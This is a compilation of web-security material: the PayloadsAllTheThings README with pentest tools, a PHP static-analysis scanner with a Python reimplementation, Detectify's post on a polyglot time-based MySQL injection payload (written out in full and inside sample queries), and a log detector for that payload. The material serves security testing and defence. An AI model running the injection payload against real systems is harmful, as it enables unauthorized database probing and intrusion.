Payloads All The Things

A list of useful payloads and bypasses for Web Application Security. Feel free to improve it with your payloads and techniques! I ❤️ pull requests 🙂

You can also contribute with a 🍻 IRL, or using the sponsor button.

Every section contains the following files; use the _template_vuln folder to create a new chapter:

  • README.md – vulnerability description and how to exploit it, including several payloads
  • Intruder – a set of files to give to Burp Intruder
  • Images – pictures for the README.md
  • Files – some files referenced in the README.md

You might also like the Methodology and Resources folder.

Want more? Check the Books and YouTube video selections.

Pentesting Tools

  • Burp Suite – https://portswigger.net/burp/communitydownload
  • OWASP ZAP – https://www.zaproxy.org/download/
  • Dirb – https://github.com/v0re/dirb.git
  • Dirbuster – https://gitlab.com/kalilinux/packages/dirbuster.git
  • Gobuster – https://github.com/OJ/gobuster.git
  • Wfuzz – https://github.com/xmendez/wfuzz.git
  • Sublist3r – https://github.com/aboul3la/Sublist3r.git
  • Massdns
  • Dnsenum
  • Knockpy
  • nmap
  • Masscan
  • Sn1per
  • XSStrike
  • Sqlmap
  • Wpscan
  • Joomscan
  • CMSmap
  • Builtwith
  • Wappalyzer
  • wafw00f

VulnyCode – PHP Code Static Analysis

Basic script to detect vulnerabilities in PHP source code; it uses regular expressions to find dangerous sinks (functions such as include() or mail()) that are fed by user-controlled input.

# HELP
╭─ 👻 swissky@crashlab: ~/Github/PHP_Code_Static_Analysis  ‹master*›
╰─$ python3 index.py           
usage: index.py [-h] [--dir DIR] [--plain]

optional arguments:
  -h, --help  show this help message and exit
  --dir DIR   Directory to analyse
  --plain     No color in output

# Example
╭─ 👻 swissky@crashlab: ~/Github/PHP_Code_Static_Analysis  ‹master*›
╰─$ python3 index.py --dir test    
------------------------------------------------------------
Analyzing 'test' source code
------------------------------------------------------------
Potential vulnerability found : File Inclusion
Line 19 in test/include.php
Code : include($_GET['patisserie'])
------------------------------------------------------------
Potential vulnerability found : Insecure E-mail
Line 2 in test/mail.php
Code : mail($dest, "subject", "message", "", "-f" . $_GET['from'])
Declared at line 1 : $dest = $_GET['who'];

Currently detecting :

  • Arbitrary Cookie
  • Arbitrary File Deletion
  • Arbitrary Variable Overwrite
  • Cross Site Scripting
  • File Inclusion
  • File Inclusion / Path Traversal
  • File Upload
  • Header Injection
  • Information Leak
  • Insecure E-mail
  • Insecure Weak Random
  • LDAP Injection
  • PHP Object Injection
  • Remote Code Execution
  • Remote Command Execution
  • Server Side Request Forgery
  • Server Side Template Injection
  • SQL Injection
  • URL Redirection
  • Weak Cryptographic Hash
  • XML external entity
  • XPATH Injection
  • Hardcoded credentials
  • High Entropy string

If you want to export each vulnerability type into its own folder, use the “export.sh” script.
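A minimal regex-based sink scanner in the spirit of the tool, added here as an illustration and not VulnyCode's own code. The PHP snippets, the sink list and the output tuple layout are constructed to mirror the README's example run above; a tainted variable assigned earlier in the file is reported as "Declared at line N", the way the tool reports $dest.

```python
import re

# Constructed sample files mirroring the two findings shown in the README output above.
SAMPLE_PHP = {
    "test/include.php": "<?php\n// constructed sample\ninclude($_GET['patisserie']);\n",
    "test/mail.php": "<?php $dest = $_GET['who'];\n"
                     "mail($dest, \"subject\", \"message\", \"\", \"-f\" . $_GET['from']);\n",
}

# User-controlled superglobals: any of these reaching a sink is a potential finding.
SOURCE = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b"

# Sink pattern -> vulnerability class (a small subset of what VulnyCode reports).
SINKS = {
    r"\b(?:include|include_once|require|require_once)\s*\(": "File Inclusion",
    r"\bmail\s*\(": "Insecure E-mail",
    r"\b(?:system|exec|shell_exec|passthru)\s*\(": "Remote Command Execution",
    r"\bunserialize\s*\(": "PHP Object Injection",
}

def tainted_vars(lines):
    """Variables assigned straight from a source: name -> (line_no, statement)."""
    taint = {}
    for no, line in enumerate(lines, 1):
        m = re.search(r"(\$\w+)\s*=(?!=)\s*[^;]*" + SOURCE, line)
        if m:
            taint[m.group(1)] = (no, line[m.start():].strip())
    return taint

def analyze(code):
    """Return (vuln_type, line_no, code, declared_at) for each sink fed by a source."""
    lines = code.splitlines()
    taint = tainted_vars(lines)
    findings = []
    for no, line in enumerate(lines, 1):
        for sink_re, vuln in SINKS.items():
            if not re.search(sink_re, line):
                continue
            direct = re.search(SOURCE, line) is not None
            # Indirect flow: a tainted variable assigned earlier in the same file.
            declared = [f"Declared at line {dno} : {decl}"
                        for var, (dno, decl) in taint.items()
                        if re.search(re.escape(var) + r"\b", line)]
            if direct or declared:
                findings.append((vuln, no, line.strip().rstrip(";"), declared))
    return findings

def scan(files):
    # Analyze every file of a {path: source} mapping, like `index.py --dir`.
    return {path: analyze(src) for path, src in files.items()}
```

Like the original, this is line-oriented pattern matching, so taint that flows through function calls or across files is not followed.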

Don’t forget to read the license 😉

Alternatives

The Ultimate SQL Injection Payload

May 29, 2013

At Detectify we often try to find the most effective way of pen testing web applications. Many researchers (and tools) use a lot of different payloads to find SQL Injections, but what if there was a payload that works in all cases? Well (un)fortunately we couldn’t find such a payload, but we invented something close! The adapting payload.

The adapting payload works in all cases where a MySQL Injection vulnerability is present and it looks like this:

IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/

If the server waits for about a second when sending this payload, chances are there’s a MySQL Injection present! But how does it work? Let’s break it down:

Adapting to MySQL version

The first thing the payload does is check whether the MySQL version supports the SLEEP() function; SLEEP() only exists from MySQL 5.0.12 onward, which is why the payload tests the first digit of @@version. If it is not available, the payload uses the BENCHMARK() function instead. Both functions make the server wait for a given amount of time, and switching between SLEEP() and BENCHMARK() makes the payload work on all MySQL versions.

Adapting to quotation

The second trick is that the payload adapts to whichever kind of quotation is used. This is done with binary operators (OR and XOR) to join the pieces together without breaking the syntax.

Example 1:

SELECT * FROM some_table WHERE double_quotes = "[Injection point]"
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

Example 2:

UPDATE some_table SET secret_value = '[Injection point]'
UPDATE some_table SET secret_value = 'IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/'

As you can see, the payload will execute our BENCHMARK() or SLEEP() regardless of which quotes are used.

Adapting to non-encapsulated queries

Last, if the injection point is not enclosed in double or single quotes, the payload puts “the rest” of itself inside a multi-line comment to avoid a syntax error.

Example:

SELECT 1,2,["Injection point"] FROM some_table WHERE ex = ample
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample

So one payload to rule them all, huh? Well, unfortunately research time ran out before we could extend the payload to other DBMSs, but for now, if you're using MySQL, feel free to use this for finding SQL injections on your own installation!
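Because the payload works identically in single-quoted, double-quoted and unquoted contexts, a detection rule keyed on quote characters would miss it; what every variant shares is the SLEEP()/BENCHMARK() delay and the @@version probe. The following added example (not from the Detectify post) scans constructed access-log lines for those primitives after URL-decoding each query parameter.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Time-delay primitives the adapting payload relies on. The rule keys on the function
# calls, not on quote characters, because the payload runs in ', " and unquoted contexts.
TIME_BASED = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)
VERSION_PROBE = re.compile(r"@@version", re.IGNORECASE)
REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+"')

# Constructed access-log lines in combined log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [29/May/2013:10:00:01 +0000] "GET /item?id=42 HTTP/1.1" 200 512
10.0.0.9 - - [29/May/2013:10:00:02 +0000] "GET /item?id=42%27XOR(IF(SUBSTR(@@version,1,1)%3C5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR%27 HTTP/1.1" 200 1402
10.0.0.9 - - [29/May/2013:10:00:03 +0000] "GET /search?q=sleep+well HTTP/1.1" 200 512
10.0.0.9 - - [29/May/2013:10:00:04 +0000] "GET /item?id=1%20or%20SlEeP%281%29 HTTP/1.1" 200 1399
"""

def inspect_target(target):
    """Decode the query string; return [(param, [functions], probes_version)] hits."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        funcs = sorted({m.group(1).upper() for m in TIME_BASED.finditer(value)})
        if funcs:
            hits.append((name, funcs, bool(VERSION_PROBE.search(value))))
    return hits

def scan_log(text):
    """Return one (ip, param, functions, probes_version) tuple per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these separately
        for name, funcs, probe in inspect_target(m.group("target")):
            findings.append((m.group("ip"), name, funcs, probe))
    return findings
```

Pair the hit with the request's service time where the log format records it (combined format does not): a delay of roughly one second on a flagged request is the signal the payload is designed to produce.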

PS. Got tired of searching for SQL injections by hand? You could always give Detectify a try and let automation do the work! Sign up for a free trial and go get those SQL injections »


https://github.com/swisskyrepo/GraphQLmap

https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
